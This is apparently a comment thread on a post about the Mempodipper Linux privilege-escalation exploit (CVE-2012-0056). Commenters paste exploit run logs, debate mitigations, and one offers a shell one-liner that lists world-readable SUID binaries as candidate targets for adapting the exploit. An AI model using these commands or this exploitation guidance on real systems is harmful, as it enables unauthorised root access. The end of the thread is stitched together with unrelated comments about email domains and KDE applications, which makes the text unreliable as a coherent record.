[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme’ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0×8049570.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/5464/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0×8049564.
[+] Executing su with shellcode.
terion@LAPTOP:~/Downloads/mempodipper$ whoami
terion
terion@LAPTOP:~/Downloads/mempodipper$ uname -a
Linux LAPTOP 3.0.0-15-generic-pae #26-Ubuntu SMP Fri Jan 20 17:07:31 UTC 2012 i686 i686 i386 GNU/Linux

[+] Opening parent mem /proc/25160/mem in child.
[+] Sending fd 8 to parent.

(For sure i changed the executed shell code to something more matching like creating a folder, instead of spawning a shell)

Security does not work that way! You cannot, after an exploit, argue that you could have blocked proc/pid/mem access. Well, you could simply not turn your computer on. The exploit does not block you from turning your computer off and never turning it on again!!! So, it is flawed!!!

There is two major issues forgot. This does not block a LSM from disabling access /proc/*/mem. This could selinux or smack for sure.

So a kernel update is not required to address this problem. Turn LSM on set up rules attack is dead as a dodo. Basically only selinux or smack approve applications can access /proc/*/mem read write. Every other applicaiton gets read only or nothing.

Injection is not assured in Linux.

Really is there any critical need for distrobutions with selinux or smack by default to rush out a kernel patch. Not at all. Just make sure they have it turned on.

This does ask serous questions why LSM on have not become kinda mandortory. No need to wait for distribution to fix this.

skunk@web1 CVE-2012-0056 % uname -a
Linux web1 2.6.39-hardened-r8 #1 SMP Sat Sep 17 13:58:22 CEST 2011 x86_64 Intel(R) Xeon(R) CPU E5520 @ 2.27GHz GenuineIntel GNU/Linuxskunk@web1 CVE-2012-0056 % ./build-and-run-exploit.sh
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme’ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x716a3d5b70.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/18668/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x716a3d5b64.
[+] Executing su with shellcode.
skunk@web1 CVE-2012-0056 % whoami
skunk

Thanks for sharing.

http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.2.1

http://packages.debian.org/changelogs/pool/main/l/linux-2.6/linux-2.6_3.2.1-1/changelog

2.6.41.10-3.fc15.x86_64 #1 SMP Mon Jan 23 15:46:37 UTC 2012

it doesn’t work. But it worked before

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/8332/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401a60.
[+] Calculating su padding.
[+] Seeking to offset 0x401a57.
[+] Executing su with shellcode.
[1] 8332 segmentation fault ./mkroot

l2program lol

TYPE 1. It is IMPOSSIBLE to have collisions.
TYPE 2. It is HIGHLY IMPROBABLE to have “natural” collisions.
TYPE 3. It is HIGHLY IMPROBABLE to have “natural” collisions, and when it happens, it is HIGHLY IMPROBABLE we will even notice.

Given the fact that the self_exec_id is reset when it reaches its maximum value, we can say that the code that generates it does not understand that it is “type 1 unique”. No security check should rely on any definition of unique different from “type 1 unique”. Is it hard to always implement “type 1 unique”? (this is not a rhetorical question!)

Well, it is very easy for me to just point… but I think it is worth mentioning…

Gentoo:
Linux udopiv3 3.1.1-hardened #31337
Linux digital-bitch 3.1.6-gentoo #1

Not vulnerable oob cause of correct permissions of /bin/su.

BUT if you’re running a vulnerable kernel version and want to test it, here’s a short snippet for you:

for p in $(echo $PATH | tr ‘:’ ‘ ‘); do find “$p” -perm -4005; done

Which will print all SUID executables in $PATH that are both readable and executable by all users.
Now you have a list of potentially vulnerable executables. You still need to see if that binary will print user input as-is. If it does, congratulations, the easy part is done.
The next step is to adapt the exploit to that executable. As we say in academia, “left as an exercise to the reader”

and

sh-3.00$ gcc mempodipper.c -o exp
sh-3.00$ ./exp
[+] Opening parent mem /proc/27364/mem in child.
[+] Sending fd 330 to parent.
sh-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache),99(nobody)

=\

Did I do it right?

I guess it is a personal choice at the end of the day, but I do acknowledge that KDE has come bounds and leaps since its early days.

I guess it depends on calculating the right offset which the C prgrm was not calculating correctly.

Running it as mentioned in site causes it to segfault

Then someone mentioned to give right offset . I get a shell but no privilege escalation either

I also disabled all CFLAGS related to stack protection etc and built it and tried again — doesn’t work

This is with a kernel built on Jan 5th (self built but also tested on Arch distro kernel)

and

su from

==========================
su –version
su (GNU coreutils) 8.15
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later .
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by David MacKenzie
=================================

Works… crap…

F.

My quick experiment seems to indicate that you could wrap self_exec_id in days or hours, which is certainly viable if there are any other uses of this value for security purposes.

Yea — this was my first idea too, that it could wrap around. Unfortunately, 32bits is big, and exec is a (comparatively) slow system call, so I think it’d take wayyy too long.

I note that the self_exec_id is only an unsigned 32 bit type – I wonder if it would also be possible to repeatedly exec() 4 billion times until you wrap back around to the original value?

The following my be helpful.

I actually went through switching over about a year ago. I thought about it for a few
years and then made the change. I wanted a shorter email and the first domain I had and
a handful of accounts I tried to sign up for would not recognize the .info extention
as valid. In addition the first first domain I use was actually quite long.

For your question on what would be a good new domain, you may want to try a
domain search form to find a domain name with your initials
or some other letter combination that makes sense to you. For example I used one to
find a domain with my two initials seperated by the letter n and a number at the end.
This shorter domain is much easier to type in all the time than the other one I used.

After I decided to make the switch I didn’t just switch right away.
It actually took me about a year and half. After creating the second account
and changing all the accounts over that I kept track of I ran both catch all
emails for about a year and a half. This way I made sure I didn’t miss anything.

Hope that helps. Stay safe.

David
$.02

(One thing that is missing from this thread is the discussion of the applications in KDE, which is really what I like so much about it. Amarok was – and is again – an music player that is better than anything you’ll find on Mac or Windows – and digikam is brilliant as well.)

I have never used any of the mail, calendar, or contact applications, so maybe I have avoided the problems. I have had some mixed results with OpenOffice but that’s not part of KDE per se.